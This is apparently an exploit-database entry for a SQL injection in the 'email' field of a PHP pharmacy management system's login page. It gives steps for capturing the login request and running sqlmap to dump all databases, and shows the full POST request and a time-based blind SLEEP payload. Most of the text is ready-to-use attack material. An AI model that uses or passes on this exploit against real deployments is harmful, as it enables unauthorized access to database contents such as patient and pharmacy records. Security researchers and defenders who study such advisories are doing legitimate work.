# Exploit Title: Pharmacy management system - 'email' SQL injection  
# Date: 19/04/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested on: XAMPP, Linux  
# Contact:  
Step 1. Capture the request of the ""  
page in burpsute  
Step 2. Save POST the packet  
Step 3. Run sqlmap on request file using command "python3 -r  
request.txt -p email --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs"  
Step 4. This will inject successfully and you will have an information  
disclosure of all databases contents  
POST the packet  
POST /dawapharma/dawapharma/login.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 62  
Connection: close  
Cookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel  
Upgrade-Insecure-Requests: 1  
Parameter: email (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: email=HI@HI.COM' AND (SELECT 1029 FROM (SELECT(SLEEP(5)))FNdi) AND 'QxLg'='QxLg&password=TEST&login=